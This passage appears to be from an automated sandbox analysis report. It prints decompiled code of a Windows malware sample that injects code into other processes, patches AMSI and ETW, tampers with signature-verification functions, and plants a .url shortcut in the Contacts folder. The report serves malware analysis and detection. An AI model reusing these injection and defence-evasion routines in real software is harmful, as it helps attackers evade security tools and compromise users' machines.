                                                                                return E03594E10( &_v24, _t64);
                                                                            }


                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47E8
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A47FB
                                                                            • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040,00000000,035A4894,?,?), ref: 035A4815
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040,00000000,035A4894,?,?,?,00000000), ref: 035A4857
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 2022580353-0
                                                                            • Opcode ID: 7ef8ddb58f375091295ab6ff9270805eac6c5a6c18bf044175a49b0c56bb8847
                                                                            • Instruction ID: ff27a24a7a5074d5f1eddd8be6cd606e7b53c4ca2c267bce7cd9ce65a3b1278b
                                                                            • Opcode Fuzzy Hash: 7ef8ddb58f375091295ab6ff9270805eac6c5a6c18bf044175a49b0c56bb8847
                                                                            • Instruction Fuzzy Hash: 393143B5A00706AFDB10DBDAE891FAFB7F8FB48610F554025E504BB350D6B0E9059BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
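                                                                            E035A45BC(void* __eax, long __ecx, void* __edx) {
                                                                                void* _t2;
                                                                                void* _t5;
                                                                                void* _t9;
                                                                                long _t10;
                                                                                void* _t11;
                                                                                SIZE_T* _t12;

                                                                                _push(__ecx);
                                                                                _t10 = __ecx;   // size of the buffer to copy
                                                                                _t11 = __edx;   // source buffer in the current process
                                                                                _t5 = __eax;    // handle of the target process
                                                                                // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                                                                                _t2 = VirtualAllocEx(__eax, 0, __ecx, 0x3000, 0x40); // executed
                                                                                _t9 = _t2;
                                                                                // copy the buffer into the memory just allocated in the target process
                                                                                WriteProcessMemory(_t5, _t9, _t11, _t10, _t12); // executed
                                                                                return _t9;     // remote address of the written buffer
                                                                            }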

                                                                            APIs
                                                                            • VirtualAllocEx.KERNEL32(0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7,00000000,kernel32.dll,ExitThread,00000000,kernel32.dll), ref: 035A45D2
                                                                            • WriteProcessMemory.KERNEL32(0A74C085,00000000,00000018,00000018,?,0A74C085,00000000,00000018,00003000,00000040,00000018,?,00000000,00000018,0A74C085,035A49C7), ref: 035A45DE
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                            • String ID:
                                                                            • API String ID: 645232735-0
                                                                            • Opcode ID: db52bdeaca576222d9dd11301522adc3dca1c45b6921b0b6e9c87c2119f8232a
                                                                            • Instruction ID: 96832806f437ff06d28c512b3747bd66edeea890a9df84e85539da57c68cd516
                                                                            • Opcode Fuzzy Hash: db52bdeaca576222d9dd11301522adc3dca1c45b6921b0b6e9c87c2119f8232a
                                                                            • Instruction Fuzzy Hash: 15D05EA634631437F53460AB7C85FA75E5CCBC7AF5E150036B70CEA191D4925C0541B8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
                                                                                                                                  _entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) { 				char _v68; 				char _v72; 				char _v76; 				char _v80; 				char _v84; 				char _v88; 				char _v92; 				intOrPtr _v96; 				char _v100; 				char _v104; 				intOrPtr _v108; 				char _v112; 				intOrPtr _v116; 				intOrPtr _v120; 				char _v124; 				char _v128; 				void* _v132; 				char _v136; 				char _v140; 				char _v144; 				intOrPtr _v148; 				char _v152; 				char _v168; 				char _v172; 				char _v176; 				char _v180; 				char _v184; 				char _v188; 				char _v192; 				intOrPtr _t105; 				void* _t106; 				intOrPtr _t114; 				intOrPtr _t120; 				intOrPtr _t150; 				intOrPtr _t151; 				intOrPtr _t153; 				DWORD* _t157; 				DWORD* _t161; 				DWORD* _t165; 				DWORD* _t169; 				DWORD* _t173; 				DWORD* _t177; 				DWORD* _t181; 				intOrPtr _t183; 				intOrPtr _t187; 				void* _t188; 				intOrPtr _t189; 				intOrPtr _t193; 				intOrPtr _t199; 				struct HINSTANCE__* _t201; 				intOrPtr _t216; 				intOrPtr _t218; 				intOrPtr _t279; 				intOrPtr _t281; 				intOrPtr _t286; 				intOrPtr _t288; 				void* _t294; 				void* _t295; 				intOrPtr _t297; 				intOrPtr _t299; 				void* _t302; 				intOrPtr _t303; 				void* _t304; 				intOrPtr _t307; 				intOrPtr _t328; 				CHAR* _t329; 				intOrPtr _t336; 				intOrPtr* _t343; 				intOrPtr* _t346; 				intOrPtr* _t354; 				intOrPtr _t356; 				intOrPtr* _t363; 				intOrPtr _t366; 				intOrPtr _t375; 				struct HINSTANCE__* _t382; 				struct HINSTANCE__* _t384; 				void* _t385; 				intOrPtr _t387; 				intOrPtr _t388; 				intOrPtr _t424; 				intOrPtr _t429; 				intOrPtr _t432; 				intOrPtr _t434; 				intOrPtr _t436; 				intOrPtr _t438; 				intOrPtr _t440; 				intOrPtr _t442; 				intOrPtr _t444; 				intOrPtr _t446; 				intOrPtr _t448; 				intOrPtr _t450; 				intOrPtr _t452; 				intOrPtr _t463; 				intOrPtr _t501; 				intOrPtr 
_t535; 				intOrPtr _t538; 				void* _t539; 				void* _t540; 				intOrPtr _t542; 				intOrPtr _t543; 				void* _t552;  				_t552 = __fp0; 				_t540 = __esi; 				_t539 = __edi; 				_t542 = _t543; 				_t385 = 0x17; 				goto L1; 				L7: 				_t388 =  *0x35ad44c; // 0x1f 				_t389 = _t388 != 0x17; 				_t151 =  *0x35ad3c8; // 0x3718e18 				E0359483C(_t151, _t388 != 0x17, 1, 0x35ad3d4); 				_t153 =  *0x35ad39c; // 0x36f4e78 				E03594728(_t153, 0x35a76bc); 				if(_t388 != 0x17) { 					L13: 					E035A552C("softpub", _t382, 0x35ad374, "AddPersonalTrustDBPages", _t540); 					_t157 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t157); 					E035A552C("softpub", _t382, 0x35ad374, "HTTPSCertificateTrust", _t540); 					_t161 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t161); 					E035A552C("softpub", _t382, 0x35ad374, "SoftpubLoadSignature", _t540); 					_t165 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t165); 					E035A552C("softpub", _t382, 0x35ad374, "SoftpubDefCertInit", _t540); 					_t169 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t169); 					E035A552C("softpub", _t382, 0x35ad374, "SoftpubCheckCert", _t540); 					_t173 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t173); 					E035A552C("softpub", _t382, 0x35ad374, "OfficeInitializePolicy", _t540); 					_t177 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t177); 					 *0x35ad374 = GetProcAddress(LoadLibraryA("softpub"), "DriverInitializePolicy"); 					_t181 =  *0x35ad374; // 0x738c4620 					VirtualProtect(0x35a4e54, 8, 0x40, _t181); 					_t463 =  *0x35ad3b4; // 0x3711bd0 					_t183 =  *0x35ad3a4; // 0x36427c8 					L035A5028(_t183, _t179,  &_v168, _t463, _t539, _t540); 					E03594390(0x35ad3a0, _v168); 					_t187 =  *0x35ad3cc; // 0x36f4eb8 					_t188 = L035977F8(_t187, __eflags); 					_t397 =  &_v172; 					_t189 =  *0x35ad3a0; // 0x366b5f8 					L035A5420(_t189, _t179,  &_v172, 
_t188, _t540); 					E03594390(0x35ad3a8, _v172); 					_t193 =  *0x35ad3a8; // 0x3619998 					E035A5140(_t193, _t179,  &_v172,  &_v180, _t539, _t540); 					L035A54C8(_v180,  &_v172,  &_v176); 					E03594390(0x35ad3b0, _v176); 					_t199 =  *0x35ad3c0; // 0x36f4e88 					E03594728(_t199, 0x35a76bc); 					if(__eflags == 0) { 						_t297 =  *0x35ad398; // 0x0 						E03594728(_t297, 0x35a76bc); 						if(__eflags != 0) { 							_t299 =  *0x35ad3c4; // 0x0 							E03594728(_t299, 0x35a76bc); 							if(__eflags != 0) { 								_t302 = E03594834(0x35ad3b0); 								_t303 =  *0x35ad3e4; // 0x3718de8 								_t304 = E035947DC(_t303); 								_t397 = 0; 								__eflags = 0; 								E035A48A8(0, 0, _t304, _t302, 0x35ad438, 0x35ad3f4, 0, 0, 0x44, 0, 0); // executed 							} 						} 					} 					_t201 = LoadLibraryA("wuapi"); // executed 					_t384 = _t201; 					E0359D390("revreSretsigeRllD", _t397,  &_v184); 					 *0x35ad384 = GetProcAddress(_t384, E035947DC(_v184)); 					VirtualProtect(0x35a4e54, 8, 0x40,  *0x35ad384); 					E0359D390("tcejbOssalCteGllD", _t397,  &_v188); 					 *0x35ad384 = GetProcAddress(_t384, E035947DC(_v188)); 					VirtualProtect(0x35a4e54, 8, 0x40,  *0x35ad384); 					_t216 =  *0x35ad398; // 0x0 					E03594728(_t216, 0x35a76bc); 					if(__eflags == 0) { 						_t286 =  *0x35ad3c0; // 0x36f4e88 						E03594728(_t286, 0x35a76bc); 						if(__eflags != 0) { 							_t288 =  *0x35ad3c4; // 0x0 							E03594728(_t288, 0x35a76bc); 							if(__eflags != 0) { 								__eflags = 0; 								E03592F78(0,  &_v192); 								_push(_v192); 								_t294 = E03594834(0x35ad3b0); 								_pop(_t295); 								E0359CB3C(_t295, _t384, _t294, _t539, _t540, _t552); 							} 						} 					} 					_t218 =  *0x35ad3c4; // 0x0 					E03594728(_t218, 0x35a76bc); 					if(__eflags == 0) { 						_t279 =  *0x35ad398; // 0x0 						E03594728(_t279, 0x35a76bc); 						if(__eflags != 0) { 							_t281 =  *0x35ad3c0; // 0x36f4e88 							E03594728(_t281, 0x35a76bc); 							if(__eflags != 0) { 								
E0359D170(E03594834(0x35ad3b0), _t384, _t397, _t539, _t540, _t552); 							} 						} 					} 					E035A552C(0x35a77b4, _t384, 0x35ad384, "EtwEventWrite", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad374, "AmsiScanString", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad378, "AmsiScanBuffer", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad37c, "AmsiOpenSession", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad380, "AmsiUacInitialize", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad380, "AmsiUacScan", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad380, "DllRegisterServer", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad380, "DllGetClassObject", _t540); 					E035A4F94(0x35a4e54); 					E035A552C(0x35a77dc, _t384, 0x35ad380, "AmsiInitialize", _t540); 					E035A4F94(0x35a4e54); 					E035A552C("amsiproxy", _t384, 0x35ad380, "DllRegisterServer", _t540); // executed 					E035A4F94(0x35a4e54); 					E035A552C("amsiproxy", _t384, 0x35ad380, "DllGetClassObject", _t540); // executed 					E035A4F94(0x35a4e54); 					E035A552C("amsiproxy", _t384, 0x35ad380, "DllCanUnloadNow", _t540); // executed 					E035A4F94(0x35a4e54); 					E035A552C("amsiproxy", _t384, 0x35ad380, "DllUnregisterServer", _t540); // executed 					E035A4F94(0x35a4e54); 					ExitProcess(0); // executed 					__eflags = 0; 					_pop(_t501); 					 *[fs:eax] = _t501; 					_push(0x35a75f1); 					E03594360( &_v192, 0x1d); 					L03595488( &_v76,  *0x35a4e2c); 					return E03594360( &_v72, 2); 				} else { 					_push( *0x35ad3dc); 					_push(0x35a76c8); 					_push("Contacts"); 					_push(0x35a76c8); 					_t307 =  *0x35ad3d4; // 0x36fc338 					E035A5140(_t307, _t382, _t389,  &_v100, _t539, _t540); 					_push(_v100); 					_push(".url"); 					E0359469C(); 					E03594534( &_v92, E035947DC(_v96)); 					if(E03597B68(_v92) != 0) { 						goto L13; 
					} else { 						_push( *0x35ad3dc); 						_push(0x35a76c8); 						_push("Contacts"); 						E0359469C(); 						E03594534( &_v104, E035947DC(_v108)); 						if(L03597B8C(_v104) == 0) { 							_push( *0x35ad3dc); 							_push(0x35a76c8); 							_push("Contacts"); 							E0359469C(); 							E03594534( &_v112, E035947DC(_v116)); 							L03597CEC(_v112); 						} 						E0359469C(); 						E03594534(0x35ad3e8, E035947DC(_v120)); 						_t328 =  *0x35ad3e8; // 0x0 						_t329 = E035947DC(_t328); 						E03592F78(0,  &_v124); 						CopyFileA(E035947DC(_v124), _t329, 0xffffffff); 						_t336 =  *0x35ad3e8; // 0x0 						E035A52EC(_t336, _t382, 0x35a7708, 0x35a76c8, _t539, _t540,  &_v128); 						E03594390(0x35ad394, _v128); 						 *0x35ad3f0 = L035936CC(1); 						 *[fs:eax] = _t543; 						_t343 =  *0x35ad3f0; // 0x0 						 *((intOrPtr*)( *_t343 + 0x38))( *[fs:eax], 0x35a6f4a, _t542, ".exe",  *0x35ad3d4, 0x35a76c8, "Contacts", 0x35a76c8,  *0x35ad3dc); 						E0359469C(); 						_t346 =  *0x35ad3f0; // 0x0 						 *((intOrPtr*)( *_t346 + 0x38))(0x35a7744,  *0x35ad394, "URL=file:\""); 						E03593000(0x64); 						L035976BC( &_v140); 						E03594628( &_v136, _v140, "IconIndex="); 						_t354 =  *0x35ad3f0; // 0x0 						 *((intOrPtr*)( *_t354 + 0x38))(); 						_t356 =  *0x35ad3d4; // 0x36fc338 						E035A5140(_t356, _t382,  *_t354,  &_v152, _t539, _t540); 						E0359469C(); 						E03594534( &_v144, E035947DC(_v148)); 						_t363 =  *0x35ad3f0; // 0x0 						 *((intOrPtr*)( *_t363 + 0x74))(".url", _v152, 0x35a76c8, "Contacts", 0x35a76c8,  *0x35ad3dc); 						_pop(_t535); 						 *[fs:eax] = _t535; 						_push(E035A6F51); 						_t366 =  *0x35ad3f0; // 0x0 						return L035936FC(_t366); 					} 				} 				L1: 				_push(0); 				_push(0); 				_t385 = _t385 - 1; 				if(_t385 != 0) { 					goto L1; 				} else { 					_push(_t385); 					E03596230(0x35a563c); 					_push(_t542); 					_push(0x35a75ea); 					_push( *[fs:eax]); 					 *[fs:eax] = _t543; 					E0359410C(0x35a5704); 					E03592FD8(); 					
_t382 = LoadLibraryA("mssip32"); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPGetRegWorkingFlags")); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPCreateIndirectData")); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPGetInfo")); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPGetSignedDataMsg")); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPPutSignedDataMsg")); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "CryptSIPVerifyIndirectData")); 					VirtualProtect(0x35a4e54, 8, 0x40, GetProcAddress(_t382, "DllRegisterServer")); 					E03594534(0x35ad3d8, E035947DC( *((intOrPtr*)(0x35a8fe4 + E0359C998(1, 4) * 4)))); 					_t105 =  *0x35ad3d8; // 0x3718de8 					_t106 = E03597B68(_t105); 					_t545 = _t106; 					if(_t106 == 0) { 						E03592FD8(); 						_t424 =  *0x35ad3d8; // 0x3718de8 						E03594390(0x35ad3e4, _t424); 					} else { 						E03592FD8(); 						_t538 =  *0x35ad3d8; // 0x3718de8 						E03594390(0x35ad3e4, _t538); 					} 					E035A52D0(_t385,  &_v68, _t545); 					E03594390(0x35ad3e0, _v68); 					_t114 =  *0x35ad3e0; // 0x36bd658 					L035A54C8(_t114, _t385,  &_v72); 					E03594390(0x35ad3d0, _v72); 					_t429 =  *0x35a8ff8; // 0x7209cc 					E035945C4( &_v80, _t429); 					_t120 =  *0x35ad3d0; // 0x3694628 					E035A51AC(_t120, _t382,  &_v76, _v80, _t540); 					_t387 =  *0x35a4e2c; // 0x35a4e30 					L035954C4(0x35ad3bc, _t387, _v76); 					_t432 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3b8,  *((intOrPtr*)(_t432 + 4))); 					_t434 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3b4,  *((intOrPtr*)(_t434 + 8))); 					_t436 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3c8,  *((intOrPtr*)(_t436 + 0xc))); 					_t438 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3a4,  *((intOrPtr*)(_t438 + 0x10))); 					_t440 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3ac,  *((intOrPtr*)(_t440 + 0x14))); 					_t442 =  
*0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad39c,  *((intOrPtr*)(_t442 + 0x18))); 					_t444 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad398,  *((intOrPtr*)(_t444 + 0x1c))); 					_t446 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3c0,  *((intOrPtr*)(_t446 + 0x20))); 					_t448 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3c4,  *((intOrPtr*)(_t448 + 0x24))); 					_t450 =  *0x35ad3bc; // 0x7f9d0018 					E03594390(0x35ad3cc,  *((intOrPtr*)(_t450 + 0x28))); 					_t452 =  *0x35a8ffc; // 0x77236c 					E035945C4( &_v88, _t452); 					E0359C4D4(_v88,  &_v84); 					E03594390(0x35ad3dc, _v84); 					_t150 =  *0x35ad3c8; // 0x3718e18 					 *0x35ad44c = _t150; 					if( *0x35ad44c != 0) { 						_t375 =  *0x35ad44c; // 0x1f 						 *0x35ad44c =  *((intOrPtr*)(_t375 - 4)); 					} 				} 				goto L7; 			}                        

                                                                            0x035a6e42
                                                                            0x035a6e52
                                                                            0x035a6e5a
                                                                            0x035a6e61
                                                                            0x035a6e7c
                                                                            0x035a6e84
                                                                            0x035a6e8b
                                                                            0x035a6e93
                                                                            0x035a6e9f
                                                                            0x035a6eb5
                                                                            0x035a6ec0
                                                                            0x035a6ec7
                                                                            0x035a6ee5
                                                                            0x035a6eea
                                                                            0x035a6f05
                                                                            0x035a6f1d
                                                                            0x035a6f28
                                                                            0x035a6f2f
                                                                            0x035a6f34
                                                                            0x035a6f37
                                                                            0x035a6f3a
                                                                            0x035a6f3f
                                                                            0x035a6f49
                                                                            0x035a6f49
                                                                            0x035a6d33
                                                                            0x035a69f0
                                                                            0x035a69f0
                                                                            0x035a69f2
                                                                            0x035a69f4
                                                                            0x035a69f5
                                                                            0x00000000
                                                                            0x035a69f7
                                                                            0x035a69f7
                                                                            0x035a69fe
                                                                            0x035a6a05
                                                                            0x035a6a06
                                                                            0x035a6a0b
                                                                            0x035a6a0e
                                                                            0x035a6a16
                                                                            0x035a6a1b
                                                                            0x035a6a2a
                                                                            0x035a6a41
                                                                            0x035a6a5b
                                                                            0x035a6a75
                                                                            0x035a6a8f
                                                                            0x035a6aa9
                                                                            0x035a6ac3
                                                                            0x035a6add
                                                                            0x035a6b04
                                                                            0x035a6b09
                                                                            0x035a6b0e
                                                                            0x035a6b13
                                                                            0x035a6b15
                                                                            0x035a6b2e
                                                                            0x035a6b38
                                                                            0x035a6b3e
                                                                            0x035a6b17
                                                                            0x035a6b17
                                                                            0x035a6b21
                                                                            0x035a6b27
                                                                            0x035a6b27
                                                                            0x035a6b4b
                                                                            0x035a6b58
                                                                            0x035a6b60
                                                                            0x035a6b65
                                                                            0x035a6b72
                                                                            0x035a6b7a
                                                                            0x035a6b80
                                                                            0x035a6b8b
                                                                            0x035a6b90
                                                                            0x035a6b9d
                                                                            0x035a6ba3
                                                                            0x035a6bad
                                                                            0x035a6bb6
                                                                            0x035a6bc0
                                                                            0x035a6bc9
                                                                            0x035a6bd3
                                                                            0x035a6bdc
                                                                            0x035a6be6
                                                                            0x035a6bef
                                                                            0x035a6bf9
                                                                            0x035a6c02
                                                                            0x035a6c0c
                                                                            0x035a6c15
                                                                            0x035a6c1f
                                                                            0x035a6c28
                                                                            0x035a6c32
                                                                            0x035a6c3b
                                                                            0x035a6c45
                                                                            0x035a6c4e
                                                                            0x035a6c58
                                                                            0x035a6c61
                                                                            0x035a6c69
                                                                            0x035a6c6f
                                                                            0x035a6c7a
                                                                            0x035a6c87
                                                                            0x035a6c8c
                                                                            0x035a6c91
                                                                            0x035a6c9d
                                                                            0x035a6c9f
                                                                            0x035a6ca9
                                                                            0x035a6ca9
                                                                            0x035a6c9d
                                                                            0x00000000

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(mssip32,00000000,035A75EA,?,?,00000016,00000000,00000000), ref: 035A6A25
                                                                            • GetProcAddress.KERNEL32(00000000,CryptSIPGetRegWorkingFlags), ref: 035A6A32
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,mssip32,00000000,035A75EA,?,?,00000016,00000000,00000000), ref: 035A6A41
                                                                            • GetProcAddress.KERNEL32(00000000,CryptSIPCreateIndirectData), ref: 035A6A4C
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPCreateIndirectData,035A4E54,00000008,00000040,00000000,mssip32,00000000,035A75EA,?,?,00000016), ref: 035A6A5B
                                                                            • GetProcAddress.KERNEL32(00000000,CryptSIPGetInfo), ref: 035A6A66
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetInfo,035A4E54,00000008,00000040,00000000,00000000,CryptSIPCreateIndirectData,035A4E54,00000008,00000040,00000000), ref: 035A6A75
                                                                            • GetProcAddress.KERNEL32(00000000,CryptSIPGetSignedDataMsg), ref: 035A6A80
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetSignedDataMsg,035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetInfo,035A4E54,00000008,00000040,00000000), ref: 035A6A8F
                                                                            • GetProcAddress.KERNEL32(00000000,CryptSIPPutSignedDataMsg), ref: 035A6A9A
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPPutSignedDataMsg,035A4E54,00000008,00000040,00000000,00000000,CryptSIPGetSignedDataMsg,035A4E54,00000008,00000040,00000000), ref: 035A6AA9
                                                                            • GetProcAddress.KERNEL32(00000000,CryptSIPVerifyIndirectData), ref: 035A6AB4
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,CryptSIPVerifyIndirectData,035A4E54,00000008,00000040,00000000,00000000,CryptSIPPutSignedDataMsg,035A4E54,00000008,00000040,00000000), ref: 035A6AC3
                                                                            • GetProcAddress.KERNEL32(00000000,DllRegisterServer), ref: 035A6ACE
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008,00000040,00000000,00000000,CryptSIPVerifyIndirectData,035A4E54,00000008,00000040,00000000), ref: 035A6ADD
                                                                              • Part of subcall function 03592FD8: QueryPerformanceCounter.KERNEL32 ref: 03592FDC
                                                                              • Part of subcall function 0359C4D4: GetEnvironmentVariableA.KERNEL32(00000000,?,00000400,?,?,?,00000000,035A6C7F,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008), ref: 0359C4FD
                                                                            • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 035A6E0C
                                                                            Strings
                                                                            • AmsiOpenSession , xrefs: 035A7451
                                                                            • wuapi , xrefs: 035A72C6
                                                                            • [InternetShortcut] , xrefs: 035A6E55
                                                                            • revreSretsigeRllD , xrefs: 035A72D8
                                                                            • DllRegisterServer , xrefs: 035A74BA, 035A7523
                                                                            • CryptSIPCreateIndirectData , xrefs: 035A6A46
                                                                            • mssip32 , xrefs: 035A6A20
                                                                            • DllCanUnloadNow , xrefs: 035A7569
                                                                            • AmsiInitialize , xrefs: 035A7500
                                                                            • EtwEventWrite , xrefs: 035A73E8
                                                                            • Contacts , xrefs: 035A6CEB, 035A6D44, 035A6D7F, 035A6DB6, 035A6ED5
                                                                            • DllRegisterServer , xrefs: 035A6AC8
                                                                            • CryptSIPGetSignedDataMsg , xrefs: 035A6A7A
                                                                            • CryptSIPGetRegWorkingFlags , xrefs: 035A6A2C
                                                                            • DllGetClassObject , xrefs: 035A74DD, 035A7546
                                                                            • .exe , xrefs: 035A6DC6
                                                                            • CryptSIPGetInfo , xrefs: 035A6A60
                                                                            • amsiproxy , xrefs: 035A7528, 035A754B, 035A756E, 035A7591
                                                                            • URL=file:" , xrefs: 035A6E64
                                                                            • AddPersonalTrustDBPages , xrefs: 035A70C1
                                                                            • amsi , xrefs: 035A7410, 035A7433, 035A7456, 035A7479, 035A749C, 035A74BF, 035A74E2, 035A7505
                                                                            • DriverInitializePolicy , xrefs: 035A71B8
                                                                            • DllUnregisterServer , xrefs: 035A758C
                                                                            • SoftpubCheckCert , xrefs: 035A7161
                                                                            • SoftpubDefCertInit , xrefs: 035A7139
                                                                            • AmsiScanString , xrefs: 035A740B
                                                                            • CryptSIPVerifyIndirectData , xrefs: 035A6AAE
                                                                            • OfficeInitializePolicy , xrefs: 035A7189
                                                                            • YAK , xrefs: 035A6B46
                                                                            • IconIndex= , xrefs: 035A6EB0
                                                                            • l#w , xrefs: 035A6C69
                                                                            • softpub , xrefs: 035A70C6, 035A70EE, 035A7116, 035A713E, 035A7166, 035A718E
                                                                            • softpub , xrefs: 035A71AC
                                                                            • AmsiUacInitialize , xrefs: 035A7474
                                                                            • HTTPSCertificateTrust , xrefs: 035A70E9
                                                                            • ntdll , xrefs: 035A73ED
                                                                            • AmsiUacScan , xrefs: 035A7497
                                                                            • SoftpubLoadSignature , xrefs: 035A7111
                                                                            • AmsiScanBuffer , xrefs: 035A742E
                                                                            • tcejbOssalCteGllD , xrefs: 035A7313
                                                                            • .url , xrefs: 035A6D05, 035A6EF5
                                                                            • CryptSIPPutSignedDataMsg , xrefs: 035A6A94
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AddressProcProtectVirtual$CopyCounterEnvironmentFileLibraryLoadPerformanceQueryVariable
                                                                            • String ID: .exe$.url$AddPersonalTrustDBPages$AmsiInitialize$AmsiOpenSession$AmsiScanBuffer$AmsiScanString$AmsiUacInitialize$AmsiUacScan$Contacts$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetRegWorkingFlags$CryptSIPGetSignedDataMsg$CryptSIPPutSignedDataMsg$CryptSIPVerifyIndirectData$DllCanUnloadNow$DllGetClassObject$DllRegisterServer$DllRegisterServer$DllUnregisterServer$DriverInitializePolicy$EtwEventWrite$HTTPSCertificateTrust$IconIndex=$OfficeInitializePolicy$SoftpubCheckCert$SoftpubDefCertInit$SoftpubLoadSignature$URL=file:"$YAK$[InternetShortcut]$amsi$amsiproxy$l#w$mssip32$ntdll$revreSretsigeRllD$softpub$softpub$tcejbOssalCteGllD$wuapi
                                                                            • API String ID: 1105154057-3494343972
                                                                            • Opcode ID: 14d4158cd77cb42502668fc48784e415f3c7b4bbb773364ad0336fe862842fe8
                                                                            • Instruction ID: 054d672b39f7b7c68fe9b7d456803b3166106a1015296b5a4dbc39d07eddf7de
                                                                            • Opcode Fuzzy Hash: 14d4158cd77cb42502668fc48784e415f3c7b4bbb773364ad0336fe862842fe8
                                                                            • Instruction Fuzzy Hash: AB324BB8340F4AAFEA10F7ADF851E5D33F1BB89600F104416A5145FB79DAB0AC0ABB55
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E035A6295(void* __eax, void* __ebx, void* __edi, void* __esi) {
	char _v8;
	char _v12;
	char _v16;
	char _v20;
	char _v24;
	char _v28;
	char _v32;
	char _v36;
	char _v40;
	char _v44;
	char _v48;
	char _v52;
	char _v56;
	char _v60;
	char _v64;
	char _v68;
	char _v72;
	char _v76;
	char _v80;
	char _v84;
	char _v88;
	char _v92;
	char _v96;
	char _v100;
	char _v104;
	char _v108;
	char _v112;
	char _v116;
	char _v120;
	char _v124;
	char _v128;
	struct HINSTANCE__* _t199;
	void* _t226;
	struct HINSTANCE__* _t227;
	struct HINSTANCE__* _t228;
	struct HINSTANCE__* _t229;
	void* _t230;
	intOrPtr _t233;
	intOrPtr _t269;
	intOrPtr _t270;

	_t267 = __esi;
